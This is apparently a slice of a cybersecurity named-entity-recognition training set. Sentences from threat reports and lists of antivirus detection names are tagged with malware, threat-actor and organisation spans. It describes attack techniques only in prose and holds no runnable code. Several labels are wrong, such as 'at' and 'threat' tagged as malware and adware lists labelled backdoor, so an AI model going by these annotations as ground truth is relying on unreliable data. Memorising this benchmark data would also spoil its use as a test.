"info": {"id": "cyner2_train_002332", "source": "cyner2_train"}} {"text": "This blogpost reveals many details about the Diskcoder.C aka ExPetr, PetrWrap, Petya, or NotPetya outbreak and related information about previously unpublished attacks.", "spans": {"MALWARE: ExPetr, PetrWrap, Petya,": [[61, 85]], "MALWARE: NotPetya": [[89, 97]]}, "info": {"id": "cyner2_train_002335", "source": "cyner2_train"}} {"text": "The group has access to zero-day exploits, 
most likely obtained through the Elderwood framework, and uses custom-developed back door malware.", "spans": {"THREAT_ACTOR: The group": [[0, 9]], "VULNERABILITY: zero-day exploits,": [[24, 42]], "THREAT_ACTOR: Elderwood framework,": [[76, 96]], "MALWARE: back door malware.": [[123, 141]]}, "info": {"id": "cyner2_train_002337", "source": "cyner2_train"}} {"text": "The group behind this operation has been launching targeted and possibly politically-motivated attacks to spy on individuals.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: operation": [[22, 31]]}, "info": {"id": "cyner2_train_002338", "source": "cyner2_train"}} {"text": "In October 2016 Forcepoint Security Labs™ discovered new versions of the MM Core backdoor being used in targeted attacks.", "spans": {"ORGANIZATION: Forcepoint Security Labs™": [[16, 41]], "MALWARE: versions": [[57, 65]], "MALWARE: MM Core backdoor": [[73, 89]]}, "info": {"id": "cyner2_train_002339", "source": "cyner2_train"}} {"text": "These samples all displayed their typical respective malware characteristics and contacted known command and control C2 servers from those families.", "spans": {"MALWARE: malware": [[53, 60]]}, "info": {"id": "cyner2_train_002340", "source": "cyner2_train"}} {"text": "Back in July 2015, a new ransomware as a service named Encryptor RaaS detected by Trend Micro as RANSOM_CRYPRAAS.SM entered the threat scene, rivaling or at least expecting to succeed the likes of similar get-rich-quick schemes from Tox and ORX Locker.", "spans": {"MALWARE: ransomware": [[25, 35]], "MALWARE: Encryptor RaaS": [[55, 69]], "ORGANIZATION: Trend Micro": [[82, 93]], "MALWARE: threat": [[128, 134]], "MALWARE: at": [[154, 156]], "MALWARE: Tox": [[233, 236]], "MALWARE: ORX Locker.": [[241, 252]]}, "info": {"id": "cyner2_train_002341", "source": "cyner2_train"}} {"text": "A backdoor also known as: Banker/W32.Bancos.688128 Trojan.Bancos W32/Trojan.VUPB-6515 Trojan-Banker.Win32.Bancos.vdfd W32.Virut.mACM 
Win32.HLLW.Autoruner2.26648 Dropper.Daws.Win32.12598 Trojan.Banker.Bancos.sn Trojan[Dropper]/Win32.Daws Trojan-Banker.Win32.Bancos.vdfd Trj/CI.A Trojan.Daws Win32.Worm.Autorun.Pepg Trojan.DR.Daws!WW+h/Y0MkUk Worm.Win32.WBNA Win32/Trojan.355", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002342", "source": "cyner2_train"}} {"text": "A backdoor also known as: Webtoolbar.Dealply Trojan.FakeAV not-a-virus:HEUR:WebToolbar.Win32.DealPly.heur Riskware.Win32.Estapa.ewzewu Trojan.Win32.Z.Dealply.1110121 Trojan.MulDrop7.57701 BehavesLike.Win32.BadFile.tc ADWARE/DealPly.rlhsh Ransom:MSIL/Hasadcrypt.A not-a-virus:HEUR:WebToolbar.Win32.Estapa.heur Trojan/Win32.Fakeav.C939114 BScope.Trojan.DiskWriter Trj/GdSda.A Trojan-Downloader.Win32.IstBar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002343", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Win32.AutoRun!O Worm.Wofopey.A4 Trojan.Bodegun.1 TSPY_AUTORUN_CD1027DD.RDXN Win32.Worm.AutoRun.ek W32/Worm.BLGL W32.SillyDC TSPY_AUTORUN_CD1027DD.RDXN Win.Trojan.Clicker-4047 Trojan.Win32.Fsysna.dilg Trojan.Win32.AutoRun.buecr Worm.Win32.A.AutoRun.329559 W32.W.AutoRun.lnZm Win32.HLLW.Autoruner.57463 BehavesLike.Win32.Virut.cz W32/Worm.PEBZ-4739 Worm/Win32.AutoRun Worm:Win32/Wofopey.A Trojan.Win32.Fsysna.dilg Worm/Win32.AutoRun.R1864 Trojan-Dropper.Serv.21221 W32/Autorun.KBE Win32/AutoRun.AEZ Win32.Trojan.Fsysna.Wqmj Worm.AutoRun!UZZkfeUh6N8 Win32/Trojan.c29", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002347", "source": "cyner2_train"}} {"text": "The document contains a malicious macro, which attempts to download the same executable file 65g3f4.exe from multiple remote locations.", "spans": {"MALWARE: malicious macro,": [[24, 40]]}, "info": {"id": "cyner2_train_002350", "source": "cyner2_train"}} {"text": "The group has quietly deployed zero-day in the past, effectively spearphished targets, and maintains a modular toolset.", "spans": 
{"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: zero-day": [[31, 39]], "THREAT_ACTOR: spearphished": [[65, 77]], "MALWARE: modular toolset.": [[103, 119]]}, "info": {"id": "cyner2_train_002352", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Sdbot.AE4 RDN/Sdbot.worm!cc Backdoor.SDBot Win32.Trojan.WisdomEyes.16070401.9500.9979 RDN/Sdbot.worm!cc Trojan[Backdoor]/Win32.Sdbot Trojan.Zusy.D1B318 Backdoor:MSIL/Getob.D Backdoor.SDBot Msil.Worm.Arcdoor.Pgda Worm.MSIL.Arcdoor W32/SDBot.DPZ!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002353", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Malware.Bucaspys.A W32.Malware.Bucaspys!c Trojan.PWS.Banker1.23491 BehavesLike.Win32.BadFile.rh W32/Trojan.MCYT-4284 Trojan:Win32/Bypass.D!bit Trj/GdSda.A W32/Banker.ADYA!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002354", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.Win32.Nuker!O W32/Trojan.Divine Win.Trojan.Nuker-3 Exploit.Win32.Nuker.Divine Exploit.Win32.Nuker.htqe Trojan.Divine Exploit.Nuker.Win32.284 W32/Trojan.Divine TR/Nuker.Divine Trojan[Exploit]/Win32.Nuker Exploit.Win32.Nuker.Divine Exploit.Nuker Nuker.Win32.Divine W32/Divine.3AD2!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002355", "source": "cyner2_train"}} {"text": "PassiveTotal New discovered infrastructure from the Satellite Turla actor.", "spans": {"ORGANIZATION: PassiveTotal": [[0, 12]], "SYSTEM: infrastructure": [[28, 42]], "THREAT_ACTOR: the Satellite Turla actor.": [[48, 74]]}, "info": {"id": "cyner2_train_002357", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.VBCrypt.MF.66 Trojan.Razy.D15523 Win32.Trojan.VB.iw W32/VBTrojan.Downloader.1D!Maxi Troj.Dropper.W32.Dinwod.mmkC TrojWare.Win32.Rimod.JO Trojan.MulDrop4.62548 Trojan.Win32.Scar W32/VBTrojan.Downloader.1D!Maxi Trojan:Win32/Bewter.A HEUR/Fakon.mwf Win32/VB.RBU 
Win32/Trojan.741", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002358", "source": "cyner2_train"}} {"text": "A backdoor also known as: Spyware.Zbot.ED WS.Reputation.1 Krypt.GB TROJ_SIGEKAF.SM Trojan:W32/Kamala.A Trojan:Win32/Hilasy.B BScope.TrojanPSW.Zbot.2716 Trojan.Win32.Hilasy W32/ZBOT.HL!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002362", "source": "cyner2_train"}} {"text": "This iteration is targeted towards victims in Vietnam and still maintains extremely low AV detection almost a year after it was first discovered.", "spans": {"SYSTEM: AV": [[88, 90]]}, "info": {"id": "cyner2_train_002363", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.3 Virus/W32.Sality.D Worm.Win32.AutoIt!O W32.Sality.U W32/Autorun.worm.bcb Win32.Sality.3 PE_SALITY.RL W32/Autorun.TX W32.Harakit Win32/Sality.AA PE_SALITY.RL Win.Trojan.Autoit-150 Worm.Win32.AutoIt.aei Win32.Sality.3 Virus.Win32.Sality.beygb Trojan.Win32.FakeFolder.avr Win32.Sality.3 Win32.Sector.30 Virus.Sality.Win32.25 BehavesLike.Win32.Evasion.jc W32/Autorun.OHSM-3021 Win32/HLLP.Kuku.poly2 W32/Sality.AT Worm:Win32/Katar.A W32.Virut.lns0 Worm.Win32.AutoIt.aei Win32.Virus.Sality.A HEUR/Fakon.mwf Win32.Sality.3 Virus.Win32.Sality.bakc Win32/Sality.NBA Win32.Sality.BL Worm.Win32.Passma W32/Sality.AA Virus.Win32.Sality.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002365", "source": "cyner2_train"}} {"text": "We assess it is highly likely that these attacks were conducted by a Chinese cyberespionage actor related to the Operation Soft Cell campaign.", "spans": {"THREAT_ACTOR: a Chinese cyberespionage actor": [[67, 97]], "THREAT_ACTOR: the Operation Soft Cell campaign.": [[109, 142]]}, "info": {"id": "cyner2_train_002366", "source": "cyner2_train"}} {"text": "A backdoor also known as: Riskware.Win32.MyBeeSearch.euqqpm Adware.Mybeesearch.17920 Adware.MyBeeSearch.Win32.35 
W32/Trojan.ZETF-8401 ADWARE/MyBeeSearch.yttss Adware.BeeSearch/Variant Trj/GdSda.A Msil.Adware.Mybeesearch.Ednu PUA.MyBeeSearch! AdWare.MSIL.Mybeesearch", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002367", "source": "cyner2_train"}} {"text": "Exploitation is being attempted via the usual tactic of spear phishing containing malicious attachments to targets.", "spans": {"VULNERABILITY: Exploitation": [[0, 12]], "ORGANIZATION: targets.": [[107, 115]]}, "info": {"id": "cyner2_train_002368", "source": "cyner2_train"}} {"text": "It spreads within networks through PsExec and WMIC commands, using credentials stolen by a tool similiar to Mimikatz.", "spans": {"SYSTEM: networks": [[18, 26]], "SYSTEM: PsExec": [[35, 41]], "SYSTEM: WMIC commands,": [[46, 60]], "MALWARE: tool": [[91, 95]], "MALWARE: Mimikatz.": [[108, 117]]}, "info": {"id": "cyner2_train_002369", "source": "cyner2_train"}} {"text": "The installer files contained custom action commands which used PowerShell to download and execute payloads Redline Stealer, Ursnif, etc. 
hosted on legitimate websites.", "spans": {"SYSTEM: PowerShell": [[64, 74]], "MALWARE: payloads Redline Stealer, Ursnif,": [[99, 132]]}, "info": {"id": "cyner2_train_002370", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Dropper.Zyon.1 Trojan.Win32.Dropper.Zyon.1 TROJ_ZYON.A TROJ_ZYON.A Trojan-Dropper.Win32.Zyon Trojan.Win32.Dropper.Zyon.1 Trojan.Win32.Zyon.hmat Troj.Dropper.W32.Zyon!c Trojan.Win32.Dropper.Zyon.1 TrojWare.Win32.Runner.Zyon Trojan.Win32.Dropper.Zyon.1 Trojan.MulDrop.103 Dropper.Zyon.Win32.4 BehavesLike.Win32.Dropper.dc W32/Trojan.AJWD-0098 TrojanDropper.Win32.Zyon W32/Zyon.A!tr Trojan[Dropper]/Win32.Zyon Trojan.Win32.Dropper.Zyon.1 Constructor/Zyon.261120 MultiDropper.cfg Win32/Runner.Zyon Win32.Trojan-dropper.Zyon.Lhdl Trojan.DR.Zyon!KwrmMz3+t6M Trojan.Win32.Runner Trojan.Win32.Dropper.Zyon.1 Dropper.Zyon.C Win32/Trojan.769", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002371", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exp.SWF.DC Exp.Flash.Pubenush.E!c Trojan.Swifi SWF/Exploit.ExKit.A Swf.Exploit.Angler-6 Exploit.Swf.CVE20130634.efwsmo Exploit.SWF.1232 HEUR_SWFDEC.SC2 BehavesLike.Flash.Exploit.nb Trojan[Exploit]/SWF.Neclu Exploit.SWF Win32/Trojan.a4a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002372", "source": "cyner2_train"}} {"text": "It is an email with the subject of Copy of Invoice 79898702coming or pretending to come from noreply@random email addresses with a semi-random named zip attachment in the format of 79898702.zip random 8 digits The zip matches the subject.", "spans": {}, "info": {"id": "cyner2_train_002373", "source": "cyner2_train"}} {"text": "The .js file in the email attachment is a PowerShell script and there are no other files involved.", "spans": {}, "info": {"id": "cyner2_train_002376", "source": "cyner2_train"}} {"text": "Malware, or CHM, disguised as a North Korea-related questionnaire is being distributed by the 
Kimsuky group, which is believed to have created and distributed the same type of malware.", "spans": {"MALWARE: Malware,": [[0, 8]], "MALWARE: CHM,": [[12, 16]], "THREAT_ACTOR: the Kimsuky group,": [[90, 108]], "MALWARE: malware.": [[176, 184]]}, "info": {"id": "cyner2_train_002379", "source": "cyner2_train"}} {"text": "The authors were probably trying to make a joke by referencing the act of getting infected with ransomware, hinting that it is uninvited and unavoidable, just like fate.", "spans": {}, "info": {"id": "cyner2_train_002381", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Poison!IK W32/Smallworm.EEA BKDR_POISON.OM W32.SillyFDC Backdoor.Win32.Poison Dropper.VB.3.AX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002382", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Sisproc.A Trojan.Sisproc Adware.Antivirus2008.Win32.13 Trojan/Jorik.Vobfus.fodz Win32.Trojan.Kryptik.gz Trojan.Malcol Win32/Tnega.cTBOJZC TROJ_REDONC_EK030008.UVPM Trojan.Win32.Antivirus2008.babyvq Trojan.DownLoader6.50299 TROJ_REDONC_EK030008.UVPM BehavesLike.Win32.Downloader.qc Trojan/Jorik.esyb Trojan/Win32.Vobfus TrojanDownloader:Win32/Redonc.D Trojan.Heur.D.E8DF45 Adware.Antivirus2008!VhbgDcClaWU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002383", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W64.Crypt.785568 Trojan.YarripCS.S244731 Trojan/Kryptik.bbq TROJ_KRYPTIK_FF070297.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_KRYPTIK_FF070297.UVPM Trojan.Win64.Crypt.gp Trojan.Win64.Kryptik.euskem Trojan.Win32.Z.Crypt.785568 Troj.Win64.Crypt!c Trojan.Crypt.Win64.20 Trojan.Crypt.ld Trojan.Win64.Crypt.gp Trojan.Bedep Trj/CI.A Win64.Trojan.Crypt.Wnms Trojan.Crypt!D766Elbq30w Trojan.Win64.Bedep", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002386", "source": "cyner2_train"}} {"text": "An Android backdoor also known as: 
Trojan.MAC.Dok.E MacOS/Aptordoc.A HEUR:Trojan-Spy.OSX.Aptordoc.b Trojan.MAC.Dok.E Trojan.Mac.Mlw.eowttl Troj.Spy.Osx!c Win32.Trojan-spy.Aptordoc.Syhr Trojan.MAC.Dok.E Mac.BackDoor.Dok.5 Trojan.Aptordoc.OSX.7 MacOS/Aptordoc.A OSX/Spy.Aptordoc.jlgtm HEUR:Trojan-Spy.OSX.Aptordoc.b Trojan.MAC.Dok.E OSX/Spy.Dok.A Trojan-Banker.OSX.Aptordoc", "spans": {"MALWARE: backdoor": [[11, 19]]}, "info": {"id": "cyner2_train_002387", "source": "cyner2_train"}} {"text": "Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years.", "spans": {"ORGANIZATION: Talos": [[0, 5]], "MALWARE: unknown Remote Administration Tool": [[24, 58]]}, "info": {"id": "cyner2_train_002388", "source": "cyner2_train"}} {"text": "In this respect, Vawtrak now has a 2-tier C2 discovery infrastructure.", "spans": {"MALWARE: Vawtrak": [[17, 24]], "SYSTEM: infrastructure.": [[55, 70]]}, "info": {"id": "cyner2_train_002390", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanproxy.Hioles.19337 Trojan.Graftor.D4C0E TSPY_PROXY_BK082A47.TOMC Win32.Trojan.WisdomEyes.16070401.9500.9968 TSPY_PROXY_BK082A47.TOMC Trojan.Proxy.23012 TrojanProxy:Win32/Hioles.B Troj.W32.Scar.lrnw Win32/TrojanProxy.Hioles.AA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002391", "source": "cyner2_train"}} {"text": "In the beginning of April 2016, we found evidence that the attacks against Israel have been renewed as well.", "spans": {}, "info": {"id": "cyner2_train_002395", "source": "cyner2_train"}} {"text": "The Turla group use a range of tools and techniques, many of which are custom.", "spans": {"THREAT_ACTOR: The Turla group": [[0, 15]], "MALWARE: tools": [[31, 36]]}, "info": {"id": "cyner2_train_002396", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.D64E1 Win32.Trojan.WisdomEyes.16070401.9500.9929 Adware.Iefeats Trojan.Win32.Yabector.ddsrdc Adware.Yabector/Variant Heur.Packed.Unknown Adware.Adon Trj/CI.A 
Win32.Trojan.Kazy.Alij Trojan.CL.Yabector!M4hXuPydivM Win32/Trojan.e93", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002397", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Sicil.AA3 Win32.Trojan.WisdomEyes.151026.9950.9999 W32/Sicil.A TROJ_SICIL_0000009.TOMA Trojan-Dropper.MSIL.Smaba.sg Trojan.Win32.Click1.ctoram BehavesLike.Win32.Dropper.zt W32/Sicil.YGNC-5779 W32/Malware_fam.NB Trojan.Buzy.D8E9 Trojan:MSIL/Sicil.A Trojan.Msil PSW.ILUSpy Trj/CI.A Win32/Trojan.132", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002398", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Z.Shellcode.403968 Troj.W32.Tpyn!c BehavesLike.Win32.PWSZbot.fh Backdoor.Win32.Kbotrep W32/Trojan.FHRX-8606 Trojan.Heur.LP.E7F983 Backdoor:Win32/Kbotrep.A Trj/CI.A Win32.Trojan.Hijacker.Hzj Win32/Trojan.e04", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002399", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAdware.B36E Application.Bundler.DomaIQ.Q PUP.Optional.BundleInstaller Adware.DomaIQ.Win32.132 Adware.DomaIQ/Variant Application.Bundler.DomaIQ.Q Win32.Adware.DomnIQ.b Infostealer.Limitail Win32/DomainIQ.eOTUWS Win.Adware.Domaiq-1 not-a-virus:AdWare.MSIL.DomaIQ.clek Application.Bundler.DomaIQ.Q Trojan.Win32.DomaIQ.ctadmg Adware.Win32.Lollipop.f Application.Bundler.DomaIQ.Q Application.Win32.DomaIQ.URT Trojan.DownLoader9.21779 AdWare/MSIL.ps Pua.Tuguu GrayWare[AdWare]/MSIL.DomaIQ TrojanDownloader:Win32/Tugspay.A not-a-virus:AdWare.MSIL.DomaIQ.clek Win32.Application.DomalQ.G PUP/Win32.DomaIQ.R99208 BScope.Downware.DomaIQ PUA.DomaIQ! 
Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002400", "source": "cyner2_train"}} {"text": "Between December 2021 and July 2022, the Mandiant Managed Defense and Incident Response teams responded to three UNC961 intrusions at different organizations that each started in similar fashion.", "spans": {"ORGANIZATION: the Mandiant Managed Defense and Incident Response teams": [[37, 93]], "THREAT_ACTOR: UNC961": [[113, 119]], "ORGANIZATION: organizations": [[144, 157]]}, "info": {"id": "cyner2_train_002403", "source": "cyner2_train"}} {"text": "When the user tries to open one of these legitimate apps, the malware replaces the genuine app window with a phishing window that asks for banking information.", "spans": {"ORGANIZATION: user": [[9, 13]], "SYSTEM: legitimate apps,": [[41, 57]], "MALWARE: malware": [[62, 69]]}, "info": {"id": "cyner2_train_002407", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.TikoraxaDSB.Trojan Trojandownloader.Script W32/Snojan.OHXS-3777 VBS/TrojanDownloader.Small.NGH Trojan.Win32.Mlw.evnleg Troj.Downloader.Script!c BehavesLike.Win32.Downloader.dh Trojan-Downloader.VBS.Small W32/Snojan.Q Trojan.Pincav.aer VBS/Dldr.Small.vxbdh Trojan.DL.Alien! 
Trojan.Snojan Trj/CI.A Script/Virus.72d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002410", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DownLoadRiniLTN.Trojan Trojan.Win32.Scar!O Trojan.Popureb.B4 Trojan/Scar.ejkj Trojan.Zusy.D2E760 TROJ_POPUREB.SM Win32.Trojan.Scar.i Win32/Scar.ZF TROJ_POPUREB.SM Win.Trojan.Scar-8452 Trojan.Win32.Scar.bccuvv Trojan.Win32.A.Scar.86016.F Backdoor.Win32.Popwin.~IT Trojan.DownLoader11.5691 Trojan.Scar.Win32.75436 BehavesLike.Win32.Dropper.mm Backdoor.Win32.Poison TR/Popureb.B.20 Trojan/Win32.Scar Win32.Troj.Poison.b.29696 Trojan:Win32/Popureb.B Trojan/Win32.PbBot.R3997 Trojan.Scar Trojan.Scar Trojan.Win32.Scar.tgh Trojan.Ghodow!qzMoVFGUIfc W32/Scar.ENA!tr Win32/Trojan.285", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002412", "source": "cyner2_train"}} {"text": "In the past, we investigated TorLocker and its flawed encryption, which was created and negotiated worldwide by a Brazilian cybercriminal.", "spans": {"MALWARE: TorLocker": [[29, 38]], "VULNERABILITY: flawed encryption,": [[47, 65]], "THREAT_ACTOR: Brazilian cybercriminal.": [[114, 138]]}, "info": {"id": "cyner2_train_002413", "source": "cyner2_train"}} {"text": "The Trojan itself is well known and contained x32 and x64 rootkits.", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: x32": [[46, 49]], "SYSTEM: x64": [[54, 57]], "MALWARE: rootkits.": [[58, 67]]}, "info": {"id": "cyner2_train_002414", "source": "cyner2_train"}} {"text": "The multiple downloads is probably a redundancy measure in case some sources are taken down.", "spans": {}, "info": {"id": "cyner2_train_002415", "source": "cyner2_train"}} {"text": "In this case it capitalized on the recent terrorist attack in New York City.", "spans": {}, "info": {"id": "cyner2_train_002416", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor-CYK.srv Backdoor/VB.alk Backdoor.VB!XZJVRUVgqYg W32/Backdoor.LPS TROJ_MALKZR.A 
Backdoor.Win32.VB.alk Backdoor.Win32.VB.37168 Backdoor.Win32.VB!IK Backdoor.Win32.Delf.~EC TROJ_MALKZR.A Heuristic.BehavesLike.Win32.Downloader.D Backdoor/VB.rj Backdoor:Win32/Norachs.A W32/Backdoor.LPS Win-Trojan/Xema.variant Trojan.Win32.VB.ALK Win32/VB.ALK Backdoor.Win32.VB W32/VB.ALK!tr BackDoor.VB.FLP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002417", "source": "cyner2_train"}} {"text": "Our analysis reveals connections between these attacks, recent strategic web compromises against Burmese government websites, and previous campaigns targeting groups in the Tibetan community.", "spans": {"THREAT_ACTOR: campaigns targeting groups": [[139, 165]]}, "info": {"id": "cyner2_train_002418", "source": "cyner2_train"}} {"text": "In past revivals, the botnet has been distributed through malicious emails containing attachments or links to compromised websites hosting exploit kit content.", "spans": {"MALWARE: the botnet": [[18, 28]], "MALWARE: exploit kit": [[139, 150]]}, "info": {"id": "cyner2_train_002419", "source": "cyner2_train"}} {"text": "A backdoor also known as: PWS-Xema.dr PWS-Xema.dr Trojan.Win32.Malware.4 W32/Smalltroj.IUNZ Win32.TRCrypt.XPACK Trojan.Win32.Pincav.cay Trojan.MulDrop.29150 Trojan:Win32/Cinject.B Win-Trojan/Ristix.8192 Trojan.Win32.Pincav.cay Packer.Win32.UnkPacker.a Trj/Downloader.MDW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002421", "source": "cyner2_train"}} {"text": "However, after reverse analysis, we found that it to be part of a brand new family, which we called Alice.", "spans": {"MALWARE: family,": [[76, 83]], "MALWARE: Alice.": [[100, 106]]}, "info": {"id": "cyner2_train_002422", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameZLEU.Worm Trojan.Reval.28280 TROJ_SPNR.05AD13 TROJ_SPNR.05AD13 Worm.MSIL.Autorun Trojan/MSIL.hcf TR/BAS.Samca.22510458 Trojan/MSIL.Hor Trojan:MSIL/Reval.A Trojan.Zusy.D53EB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 
{"id": "cyner2_train_002426", "source": "cyner2_train"}} {"text": "These analysts were linked by their coverage of the telecommunications industry, making this targeting very similar to, and likely a continuation of, activity described in our In Pursuit of Optical Fibers and Troop Intel blog.", "spans": {}, "info": {"id": "cyner2_train_002427", "source": "cyner2_train"}} {"text": "Perhaps the most interesting aspect of the Snake Wine group is the number of techniques used to obscure attribution.", "spans": {"THREAT_ACTOR: Snake Wine group": [[43, 59]]}, "info": {"id": "cyner2_train_002428", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dumpy.A6 Trojan.Zusy.DFB8F W32.Dompie WORM_DUMPY.SM23 Trojan.Win32.Hesv.apqe Trojan.Win32.AVKill.dqemmh Troj.W32.Scar.tnl2 TrojWare.Win32.Injector.XYNZ Trojan.AVKill.33151 WORM_DUMPY.SM23 WORM/Taranis.2225 Trojan.Win32.Hesv.apqe HEUR/Fakon.mwf Trojan.Scar Worm.AutoRun Worm.Win32.Dumpy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002429", "source": "cyner2_train"}} {"text": "It mainly targets Chinese users, but has also successfully affected people and organizations in the United States, United Kingdom, Thailand, Spain, and Ireland.", "spans": {"ORGANIZATION: Chinese users,": [[18, 32]], "ORGANIZATION: people": [[68, 74]], "ORGANIZATION: organizations": [[79, 92]]}, "info": {"id": "cyner2_train_002431", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Swisyn!O VirTool.VBInject.DZ Trojan.Swisyn.Win32.11562 Troj.W32.Swisyn.lsGr Win32.Worm.IRCBot.ad W32/MalwareS.BHPN Win32/Swisyn.DJ TROJ_SWISYN.SMK Trojan.Win32.Swisyn.ahwe Trojan.Win32.Swisyn.btyha Trojan.Win32.A.Swisyn.327680 Trojan.VbCrypt.68 TROJ_SWISYN.SMK BehavesLike.Win32.VBObfus.fm Trojan.Win32.Swisyn Trojan/Swisyn.lxc Trojan.Symmi.D2474 Trojan.Win32.Swisyn.ahwe Trojan/Win32.Swisyn.R2925 Trojan.VBRA.03646 W32/Swisyn.F.worm Win32/AutoRun.IRCBot.FL Virus.Win32.Virut.ue Win32/RootKit.Rootkit.7e5", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002433", "source": "cyner2_train"}} {"text": "The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades.", "spans": {"MALWARE: The malware": [[0, 11]]}, "info": {"id": "cyner2_train_002436", "source": "cyner2_train"}} {"text": "A backdoor also known as: Zum.Razy.1 Win32.Trojan.WisdomEyes.16070401.9500.9999 Zum.Razy.1 Zum.Razy.1 BehavesLike.Win32.Trojan.dh Zum.Razy.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002437", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.NSIS.NeksMiner.A WORM_CO.331300D2 Win32.Trojan.WisdomEyes.16070401.9500.9766 W32/Adware.DEZV-3749 Trojan.Coinbitminer WORM_CO.331300D2 Win.Trojan.Virtob-1633 Worm.NSIS.BitMin.d Trojan.Win32.BitCoinMiner.ddjqfi Trojan.BtcMine.1665 BehavesLike.Win32.TrojanCoinMiner.vc Trojan-PSW.Win32.Tepfer W32/Adware.ALRW RiskTool.BitCoinMiner.bf Trojan[PSW]/Win32.Tepfer Worm:Win32/NeksMiner.A Trojan.Strictor.D1B5F4 Worm.NSIS.BitMin.d Trojan/Win32.BitCoinMiner.C931392 TScope.Malware-Cryptor.SB RiskWare.BitCoinMiner NSIS/CoinMiner.T Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002443", "source": "cyner2_train"}} {"text": "Recently observed initial threat activities targeting the telecommunication sector.", "spans": {"MALWARE: threat activities": [[26, 43]], "ORGANIZATION: the telecommunication sector.": [[54, 83]]}, "info": {"id": "cyner2_train_002446", "source": "cyner2_train"}} {"text": "We decided to check the original plugin package and, to our surprise, found the file in the source! 
We also discovered that we were not the only ones that found this file although people on the forum seemed to believe that the file was just vulnerable .", "spans": {}, "info": {"id": "cyner2_train_002447", "source": "cyner2_train"}} {"text": "This way, the HTA effectively serves as a wrapper to try and slip passed traditional file type-based scanning in the network as well as anti-spam services.", "spans": {"MALWARE: HTA": [[14, 17]], "SYSTEM: network": [[117, 124]], "SYSTEM: as anti-spam services.": [[133, 155]]}, "info": {"id": "cyner2_train_002450", "source": "cyner2_train"}} {"text": "ESET researchers discovered a campaign that we attribute with high confidence to the APT group Tick.", "spans": {"ORGANIZATION: ESET researchers": [[0, 16]], "THREAT_ACTOR: campaign": [[30, 38]], "THREAT_ACTOR: the APT group Tick.": [[81, 100]]}, "info": {"id": "cyner2_train_002452", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Small.eivvce Trojan.Inject2.21676 BehavesLike.Win64.BadFile.wc PUA.Zzinfor TrojanDropper.Dinwod.aml Dropper/Win32.Dinwod.C1833968 Trojan.Mikey.D1229E 